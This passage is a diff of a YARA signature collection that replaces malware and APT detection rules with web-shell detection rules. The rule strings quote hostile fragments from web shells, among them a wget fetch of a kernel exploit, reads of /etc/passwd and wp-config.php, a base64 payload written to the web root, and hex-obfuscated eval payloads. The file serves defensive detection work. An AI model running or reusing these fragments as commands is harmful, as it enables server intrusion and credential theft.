-		hash3 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
-		hash4 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
-		hash5 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
-		hash6 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
+		hash1 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+		hash2 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
+		hash3 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
+		hash4 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash5 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
+		hash6 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
 
 	strings:
-		$s1 = "%ws_out%ws" fullword wide
-		$s2 = "dnlibsh" fullword ascii
-		$op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b }
-		$op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f }
-		$op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 }
+		$s0 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">Kernel attack (Krad.c) PT1 (If wget installed)" fullword ascii
+		$s1 = "<center>Kernel Info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">" fullword ascii
+		$s3 = "cut -d: -f1,2,3 /etc/passwd | grep ::" ascii
+		$s4 = "which wget curl w3m lynx" ascii
+		$s6 = "netstat -atup | grep IST" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of ( $s* ) and 1 of ( $op* )
+		filesize < 685KB and 2 of them
 }
-rule SIGNATURE_BASE_Malicious_SFX1 : FILE
+rule SIGNATURE_BASE_Webshell_Acidpoison : FILE
 {
 	meta:
-		description = "SFX with voicemail content"
+		description = "Detects Poison Sh3ll - Webshell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7c29dfb0-bbed-5017-80b4-a5c44024cd70"
-		date = "2015-07-20"
-		modified = "2023-12-05"
-		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_minidionis.yar#L39-L53"
+		id = "6c201221-ca67-57fb-9bc7-fab4fc1da982"
+		date = "2016-01-11"
+		modified = "2025-11-03"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9428-L9451"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f"
-		logic_hash = "fd7b4c504a52e68fe87eeb9f7066c61ddc47257ac9324a60d219c022d3affbbf"
-		score = 75
+		logic_hash = "31add38bcdc33d5e4b825bfa18ff1a47d5aa5aaeebd8e3adac533c471aa30629"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash3 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash4 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash5 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash6 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash7 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
+		hash8 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
+		hash9 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+		hash10 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
 
 	strings:
-		$s0 = "voicemail" ascii
-		$s1 = ".exe" ascii
+		$s1 = "elseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 1000KB and $s0 in ( 3 .. 80 ) and $s1 in ( 3 .. 80 )
+		filesize < 550KB and all of them
 }
-rule SIGNATURE_BASE_Malicious_SFX2 : FILE
+rule SIGNATURE_BASE_Webshell_Acid_Fatalisticz_Fx_Fx_P0Ison_Sh3Ll_X0Rg_Byp4Ss_256 : FILE
 {
 	meta:
-		description = "SFX with adobe.exe content"
+		description = "Detects Webshell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ff59d638-4d82-5a14-b346-3df2154d3c34"
-		date = "2015-07-20"
-		modified = "2023-12-05"
-		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_minidionis.yar#L55-L70"
+		id = "80f7d202-adb8-5d9c-b176-576e3b9553c1"
+		date = "2016-01-11"
+		modified = "2025-11-03"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9453-L9472"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d"
-		logic_hash = "a2ed7660604ff3c9f2d0dbb454f5d168cd61d1d5e647b5c74fe24f25ebb3dbfd"
-		score = 75
+		logic_hash = "07cd255247c9a77b1c9b6049a2b96632252ea9572880b10991c6797c14a05d48"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash2 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash3 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash4 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+		hash5 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
 
 	strings:
-		$s1 = "adobe.exe" fullword ascii
-		$s2 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide
-		$s3 = "GETPASSWORD1" fullword wide
+		$s0 = "<form method=\"POST\"><input type=hidden name=act value=\"ls\">" fullword ascii
+		$s2 = "foreach($quicklaunch2 as $item) {" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		filesize < 882KB and all of them
 }
-rule SIGNATURE_BASE_Minidionis_VBS_Dropped : FILE
+rule SIGNATURE_BASE_Webshell_Ayyildiz : FILE
 {
 	meta:
-		description = "Dropped File - 1.vbs"
+		description = "Detects Webshell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f0116861-4216-504a-a39b-463e7535a2b3"
-		date = "2015-07-21"
-		modified = "2023-12-05"
-		reference = "https://malwr.com/analysis/ZDc4ZmIyZDI4MTVjNGY5NWI0YzE3YjIzNGFjZTcyYTY/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_minidionis.yar#L72-L89"
+		id = "cc752958-eb6c-5185-b94c-5fcec833924d"
+		date = "2016-01-11"
+		modified = "2025-11-03"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9474-L9493"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "97dd1ee3aca815eb655a5de9e9e8945e7ba57f458019be6e1b9acb5731fa6646"
-		logic_hash = "a24fe4cdff6dd7951af10710eb63ab1fd90ab0e43bbce4388d6687abac206da5"
-		score = 75
+		logic_hash = "8441b7d730e337e002eeb7ae8f489e405409ddbe62f45bbc9a74c935d1d9fe66"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0e25aec0a9131e8c7bd7d5004c5c5ffad0e3297f386675bccc07f6ea527dded5"
+		hash2 = "9c43aada0d5429f8c47595f79a7cdd5d4eb2ba5c559fb5da5a518a6c8c7c330a"
+		hash3 = "2ebf3e5f5dde4a27bbd60e15c464e08245a35d15cc370b4be6b011aa7a46eaca"
+		hash4 = "77a63b26f52ba341dd2f5e8bbf5daf05ebbdef6b3f7e81cec44ce97680e820f9"
+		hash5 = "61c4fcb6e788c0dffcf0b672ae42b1676f8a9beaa6ec7453fc59ad821a4a8127"
 
 	strings:
-		$s1 = "Wscript.Sleep 5000" ascii
-		$s2 = "Set FSO = CreateObject(\"Scripting.FileSystemObject\")" ascii
-		$s3 = "Set WshShell = CreateObject(\"WScript.Shell\")" ascii
-		$s4 = "If(FSO.FileExists(\"" ascii
-		$s5 = "then FSO.DeleteFile(\".\\" ascii
+		$s0 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">Parent Directory</option>\\n\";" fullword ascii
+		$s1 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" fullword ascii
 
 	condition:
-		filesize < 1KB and all of them and $s1 in ( 0 .. 40 )
+		filesize < 112KB and all of them
 }
-rule SIGNATURE_BASE_MAL_WIN_Akira_Apr25 : FILE
+rule SIGNATURE_BASE_Webshell_Zehir : FILE
 {
 	meta:
-		description = "This Yara rule from ISH Tecnologia's Heimdall Security Research Team detects key components of Akira Ransomware"
-		author = "0x0d4y-Icaro Cesar"
-		id = "76722cb6-70be-465f-9ef1-afd78f694289"
-		date = "2025-04-11"
-		modified = "2025-04-16"
-		reference = "https://ish.com.br/wp-content/uploads/2025/04/A-Anatomia-do-Ransomware-Akira-e-sua-expansao-multiplataforma.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_win_akira_apr25.yar#L1-L28"
+		description = "Detects Webshell - rule generated from from files elmaliseker.asp, zehir.asp, zehir.txt, zehir4.asp, zehir4.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7f8f15a6-1c5b-5c75-b61a-df7b18699f5a"
+		date = "2016-01-11"
+		modified = "2025-11-03"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9495-L9514"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "205589629ead5d3c1d9e914b49c08589"
-		logic_hash = "112f844dff4c48d861f86736503da51e8fbc58805f463df1f9358781034f2e24"
-		score = 90
+		logic_hash = "c8fda66ada3581d2471b322ae65032b68c69b882c29f7469dd2ed78800c9c5f7"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		rule_matching_tlp = "TLP:WHITE"
-		rule_sharing_tlp = "TLP:WHITE"
-		malpedia_family = "win.akira"
+		hash1 = "16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218"
+		hash2 = "0c5f8a2ed62d10986a2dd39f52886c0900a18c03d6d279207b8de8e2ed14adf6"
+		hash3 = "cb9d5427a83a0fc887e49f07f20849985bd2c3850f272ae1e059a08ac411ff66"
+		hash4 = "b57bf397984545f419045391b56dcaf7b0bed8b6ee331b5c46cee35c92ffa13d"
+		hash5 = "febf37a9e8ba8ece863f506ae32ad398115106cc849a9954cbc0277474cdba5c"
 
 	strings:
-		$code_custom_algorithm = { 44 8B CF 90 42 0F B6 4C 0D ?? 83 E9 4E 44 8D 04 89 45 03 C0 B8 09 04 02 81 41 F7 E8 41 03 D0 C1 FA 06 8B C2 C1 E8 1F 03 D0 6B C2 7F 44 2B C0 41 83 C0 7F B8 09 04 02 81 41 F7 E8 41 03 D0 C1 FA 06 8B C2 C1 E8 1F 03 D0 6B C2 7F 44 2B C0 46 88 44 0D ?? 49 FF C1 }
-		$code_aes_key_expansion = { 41 8D 41 FF 33 D2 8B 0C ?? 41 8B C1 41 F7 F2 85 D2 75 ?? 44 8B C1 0F B6 C1 0F B6 0C ?? 41 8B C0 48 C1 E8 ?? C1 E1 ?? 0F B6 04 ?? 0B C8 41 8B C0 48 C1 E8 ?? C1 E1 ?? 0F B6 D0 49 C1 E8 ?? 0F B6 04 ?? 0B C8 41 0F B6 C0 C1 E1 ?? 0F B6 14 ?? 0F B6 45 00 0B CA 33 C8 48 FF C5 }
-		$akira_str_I = "akira" ascii
-		$akira_str_II = "onion" ascii
-		$akira_str_III = "powershell" ascii
-		$akira_str_IV = "akira_readme.txt" ascii
+		$s1 = "for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';" fullword ascii
+		$s2 = "if (frmUpload.max.value<=0) frmUpload.max.value=1;" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $code_* ) and all of ( $akira_str_* )
+		filesize < 200KB and 1 of them
 }
-rule SIGNATURE_BASE_Mimikatz_Kirbi_Ticket : FILE
+rule SIGNATURE_BASE_Uploadshell_98038F1Efa4203432349Badabad76D44337319A6 : FILE
 {
 	meta:
-		description = "KiRBi ticket for mimikatz"
-		author = "Benjamin DELPY (gentilkiwi); Didier Stevens"
-		id = "a37249e0-ab3b-50c2-9473-1e69185713cc"
-		date = "2016-08-13"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_kirbi_mimkatz.yar#L10-L23"
+		description = "Detects a web shell"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f385b091-ce0d-5d5b-8eeb-57e00c8d0210"
+		date = "2016-09-10"
+		modified = "2025-11-03"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9525-L9540"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2a62c24954d64346e419985ef5bf2b357b2aee41ac6b33d379dbd65cf5c9f92b"
+		logic_hash = "68f0de84a387a9af1a32dd8d38c66b002e16e1c954a51e6bc307580180faedbf"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "506a6ab6c49e904b4adc1f969c91e4f1a7dde164be549c6440e766de36c93215"
 
 	strings:
-		$asn1 = { 76 82 ?? ?? 30 82 ?? ?? a0 03 02 01 05 a1 03 02 01 16 }
-		$asn1_84 = { 76 84 ?? ?? ?? ?? 30 84 ?? ?? ?? ?? a0 84 00 00 00 03 02 01 05 a1 84 00 00 00 03 02 01 16 }
+		$s2 = "$lol = file_get_contents(\"../../../../../wp-config.php\");" fullword ascii
+		$s6 = "@unlink(\"./export-check-settings.php\");" fullword ascii
+		$s7 = "$xos = \"Safe-mode:[Safe-mode:\".$hsafemode.\"] " fullword ascii
 
 	condition:
-		$asn1 at 0 or $asn1_84 at 0
+		( uint16( 0 ) == 0x3f3c and filesize < 6KB and ( all of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_APT_MAL_Fujinama : FILE
+rule SIGNATURE_BASE_Dkshell_F0772Be3C95802A2D1E7A4A3F5A45Dcdef6997F3 : FILE
 {
 	meta:
-		description = "Fujinama RAT used by Leonardo SpA Insider Threat"
-		author = "ReaQta Threat Intelligence Team"
-		id = "b10b1e45-aa6c-53fa-8e02-7a325c3e12fb"
-		date = "2021-01-07"
-		modified = "2023-12-05"
-		reference = "https://reaqta.com/2021/01/fujinama-analysis-leonardo-spa"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fujinama_rat.yar#L1-L22"
+		description = "Detects a web shell"
+		author = "Florian Roth (Nextron Systems)"
+		id = "161ceca6-f5e8-5bcf-bc31-2a2169b1a1c7"
+		date = "2016-09-10"
+		modified = "2025-11-03"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9542-L9556"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9bff8ee5424a939b5278b2d1b349d898d138b9efb3cf783221826abb4d8015ef"
+		logic_hash = "81b0a08d1b9d3640e656a5cd08b79c0a2f940a2db5c2d939d19509f993514e86"
 		score = 75
-		quality = 51
+		quality = 85
 		tags = "FILE"
-		version = "1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7ea49d5c29f1242f81f2393b514798ff7caccb50d46c60bdfcf61db00043473b"
 
 	strings:
-		$kaylog_1 = "SELECT" wide ascii nocase
-		$kaylog_2 = "RIGHT" wide ascii nocase
-		$kaylog_3 = "HELP" wide ascii nocase
-		$kaylog_4 = "WINDOWS" wide ascii nocase
-		$computername = "computername" wide ascii nocase
-		$useragent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" wide ascii nocase
-		$pattern = "'()*+,G-./0123456789:" wide ascii nocase
-		$function_1 = "t_save" wide ascii nocase
-		$cftmon = "cftmon" wide ascii nocase
-		$font = "Tahoma" wide ascii nocase
+		$s1 = "<?php Error_Reporting(0); $s_pass = \"" ascii
+		$s2 = "$s_func=\"cr\".\"eat\".\"e_fun\".\"cti\".\"on" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		( uint16( 0 ) == 0x3c0a and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Exp_EPS_CVE20152545 : CVE_2015_2545 FILE
+rule SIGNATURE_BASE_Unknown_8Af033424F9590A15472A23Cc3236E68070B952E : FILE
 {
 	meta:
-		description = "Detects EPS Word Exploit CVE-2015-2545"
+		description = "Detects a web shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a5f0554-b588-5b82-93df-0fdfba2af2da"
-		date = "2017-07-19"
-		modified = "2023-12-05"
-		reference = "Internal Research - ME"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2015_2545.yar#L2-L16"
+		id = "fcf467b6-f49a-52d0-a57f-9f3cf6d0b25b"
+		date = "2016-09-10"
+		modified = "2025-11-03"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9558-L9573"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e1aac80a06dd71352d2776b4dfccce901d47363459853a37669af69be6e962c7"
-		score = 70
+		logic_hash = "d7dc9a2a5e0800b5061cb2101d7cda023a6e637f1e7b14054fdb6a0b2cec6084"
+		score = 75
 		quality = 85
-		tags = "CVE-2015-2545, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3382b5eaaa9ad651ab4793e807032650667f9d64356676a16ae3e9b02740ccf3"
 
 	strings:
-		$s1 = "word/media/image1.eps" ascii
-		$s2 = "-la;7(la+" ascii
+		$s1 = "$check = $_SERVER['DOCUMENT_ROOT']" fullword ascii
+		$s2 = "$fp=fopen(\"$check\",\"w+\");" fullword ascii
+		$s3 = "fwrite($fp,base64_decode('" ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and ( $s1 and #s2 > 20 )
+		( uint16( 0 ) == 0x6324 and filesize < 6KB and ( all of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_TA17_318A_Rc4_Stack_Key_Fallchill : FILE
+rule SIGNATURE_BASE_Dkshell_4000Bd83451F0D8501A9Dfad60Dce39E55Ae167D : FILE
 {
 	meta:
-		description = "HiddenCobra FallChill - rc4_stack_key"
-		author = "US CERT"
-		id = "0a2afcab-f540-592f-aa75-64c0a13d26f3"
-		date = "2017-11-15"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_318A.yar#L10-L21"
+		description = "Detects a web shell"
+		author = "Florian Roth (Nextron Systems)"
+		id = "804f7229-1440-5a2e-91cd-a58a38b22aa9"
+		date = "2016-09-10"
+		modified = "2025-11-03"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9575-L9593"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f284cb492ff5242d7bf577580fd95723ef7d3f109c7217a26bbefbbff7150255"
+		logic_hash = "26d586e32d1b0b7800b4b61f592dadc3dd0583628e4cd3fa4e24e02067077da5"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "51a16b09520a3e063adf10ff5192015729a5de1add8341a43da5326e626315bd"
 
 	strings:
-		$stack_key = { 0d 06 09 2a ?? ?? ?? ?? 86 48 86 f7 ?? ?? ?? ?? 0d 01 01 01 ?? ?? ?? ?? 05 00 03 82 41 8b c9 41 8b d1 49 8b 40 08 48 ff c2 88 4c 02 ff ff c1 81 f9 00 01 00 00 7c eb }
+		$x1 = "DK Shell - Took the Best made it Better..!!" fullword ascii
+		$x2 = "preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x" ascii
+		$x3 = "echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';" fullword ascii
+		$s1 = "echo '<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">';" fullword ascii
+		$s9 = "$x = $_GET[\"x\"];" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and $stack_key
+		( uint16( 0 ) == 0x3f3c and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_TA17_318A_Success_Fail_Codes_Fallchill : FILE
+rule SIGNATURE_BASE_Webshell_5786D7D9F4B0Df731D79Ed927Fb5A124195Fc901 : FILE
 {
 	meta:
-		description = "HiddenCobra FallChill - success_fail_codes"
-		author = "US CERT"
-		id = "f2390b03-238e-5ae6-af85-e5dd5790362f"
-		date = "2017-11-15"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_318A.yar#L23-L37"
+		description = "Detects a web shell"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7958e5fc-5ac5-58bc-8128-0a778e99a4e4"
+		date = "2016-09-10"
+		modified = "2025-11-03"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9595-L9609"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "73f6b36554d83f7708e9468602e529c4865269d362ebeebf6b355ccf7c2a8686"
+		logic_hash = "348ccdf997965fbea791d835f1dd4e2c16d37a17ff4195e585fa4226f18faad6"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b1733cbb0eb3d440c4174cc67ca693ba92308ded5fc1069ed650c3c78b1da4bc"
 
 	strings:
-		$s0 = { 68 7a 34 12 00 }
-		$s1 = { ba 7a 34 12 00 }
-		$f0 = { 68 5c 34 12 00 }
-		$f1 = { ba 5c 34 12 00 }
+		$s1 = "preg_replace(\"\\x2F\\x2E\\x2A\\x2F\\x65\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x" ascii
+		$s2 = "input[type=text], input[type=password]{" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and ( ( $s0 and $f0 ) or ( $s1 and $f1 ) )
+		( uint16( 0 ) == 0x6c3c and filesize < 80KB and all of them )
 }
-
-rule SIGNATURE_BASE_Hiddencobra_Fallchill_1 : FILE
+rule SIGNATURE_BASE_Webshell_E8Eaf8Da94012E866E51547Cd63Bb996379690Bf : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Detects a web shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5bbeb5ba-93d7-5903-9132-749afe5776ae"
-		date = "2017-11-15"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_318A.yar#L51-L77"
+		id = "8fda9b9f-9a72-5123-91d7-0d0aec9e17bc"
+		date = "2016-09-10"
+		modified = "2025-11-03"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9611-L9626"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8e6215a81272ea457318dd83eff9e1902c5e1d1a124ff674b145f2dc5e4a3711"
+		logic_hash = "044491f0b07ef606aa76e70a07d161565f9cecf73e8f9f8db63cacc1c475b056"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a606716355035d4a1ea0b15f3bee30aad41a2c32df28c2d468eafd18361d60d6"
+		hash1 = "027544baa10259939780e97dc908bd43f0fb940510119fc4cce0883f3dd88275"
 
 	strings:
-		$s1 = "REGSVR32.EXE.MUI" fullword wide
-		$s2 = "Microsoft Corporation. All rights reserved." fullword wide
-		$s3 = "c%sd.e%sc %s > \"%s\" 2>&1" fullword wide
-		$s4 = "\" goto Loop" fullword ascii
-		$e1 = "xolhvhlxpvg" fullword ascii
-		$e2 = "tvgslhgybmanv" fullword ascii
-		$e3 = "CivagvTllosvok32Smakhslg" fullword ascii
-		$e4 = "GvgCfiivmgDrivxglibW" fullword ascii
-		$e5 = "OkvmPilxvhhTlpvm" fullword ascii
+		$x1 = "@exec('./bypass/ln -s /etc/passwd 1.php');" fullword ascii
+		$x2 = "echo \"<iframe src=mysqldumper/index.php width=100% height=100% frameborder=0></iframe> \";" fullword ascii
+		$x3 = "@exec('tar -xvf mysqldumper.tar.gz');" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "6135d9bc3591ae7bc72d070eadd31755" or 3 of ( $s* ) or 4 of them )
+		( uint16( 0 ) == 0x213c and filesize < 100KB and 1 of ( $x* ) ) or ( 2 of them )
 }
-
-rule SIGNATURE_BASE_Hiddencobra_Fallchill_2 : FILE
+rule SIGNATURE_BASE_Unknown_0F06C5D1B32F4994C3B3Abf8Bb76D5468F105167 : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Detects a web shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c343e8e4-0785-5a47-99c1-98b189f4aaa0"
-		date = "2017-11-15"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_318A.yar#L79-L97"
+		id = "efd09da2-f232-5a21-99c8-dc2bf00baa73"
+		date = "2016-09-10"
+		modified = "2025-11-03"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
